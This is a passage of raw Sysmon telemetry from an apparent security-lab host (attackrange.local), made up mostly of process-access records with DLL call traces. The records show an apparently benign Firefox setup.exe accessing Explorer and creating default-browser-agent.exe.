wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3 10341000x800000000000000014722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1099df(wow64)|C:\Windows\System32\windows.storage.dll+a06a8(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64) 10341000x800000000000000014718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a591(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64) 10341000x800000000000000014717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64) 10341000x800000000000000014715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 10341000x800000000000000014714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+1081a1(wow64)|C:\Windows\System32\windows.storage.dll+2da45f(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64) 10341000x800000000000000014713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64)|C:\Windows\System32\windows.storage.dll+107954(wow64)|C:\Windows\System32\windows.storage.dll+10c760(wow64)|C:\Windows\System32\windows.storage.dll+10a52d(wow64) 10341000x800000000000000014711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+264da(wow64)|C:\Windows\System32\shcore.dll+297f0(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64) 10341000x800000000000000014710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+2983c(wow64)|C:\Windows\System32\shcore.dll+297cb(wow64)|C:\Windows\System32\shcore.dll+299c5(wow64)|C:\Windows\System32\shcore.dll+29d58(wow64)|C:\Windows\System32\shcore.dll+29dc5(wow64)|C:\Windows\System32\windows.storage.dll+10b0ba(wow64)|C:\Windows\System32\windows.storage.dll+10ad75(wow64)|C:\Windows\System32\windows.storage.dll+10abd6(wow64)|C:\Windows\System32\windows.storage.dll+49ffbc(wow64)|C:\Windows\System32\windows.storage.dll+2e354b(wow64)|C:\Windows\System32\windows.storage.dll+2da249(wow64)|C:\Windows\System32\windows.storage.dll+1063e2(wow64)|C:\Windows\System32\windows.storage.dll+105d40(wow64) 11241100x800000000000000014709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}6900C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exeC:\Program Files\Mozilla Firefox\default-browser-agent.exe2021-01-18 13:59:52.286 10341000x800000000000000014708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b19c(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:52.286{59A5CD1D-9457-6005-2B05-00000000A301}69006524C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe{59A5CD1D-93FA-6005-FC04-00000000A301}3784C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6eeec(wow64)|C:\Windows\System32\KERNELBASE.dll+c6908(wow64)|C:\Windows\System32\shcore.dll+26498(wow64)|C:\Windows\System32\shcore.dll+230fc(wow64)|C:\Windows\System32\windows.storage.dll+10b0cf(wow64)|C:\Windows\System32\windows.storage.dll+10a9f9(wow64)|C:\Windows\System32\windows.storage.dll+10aa8b(wow64)|C:\Windows\System32\windows.storage.dll+10a655(wow64)|C:\Windows\System32\windows.storage.dll+10a605(wow64)|C:\Windows\System32\windows.storage.dll+10a574(wow64)|C:\Windows\System32\windows.storage.dll+10a100(wow64)|C:\Windows\System32\windows.storage.dll+a0729(wow64)|C:\Windows\System32\windows.storage.dll+f9471(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+22d3|C:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe+13a8 10341000x800000000000000014706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 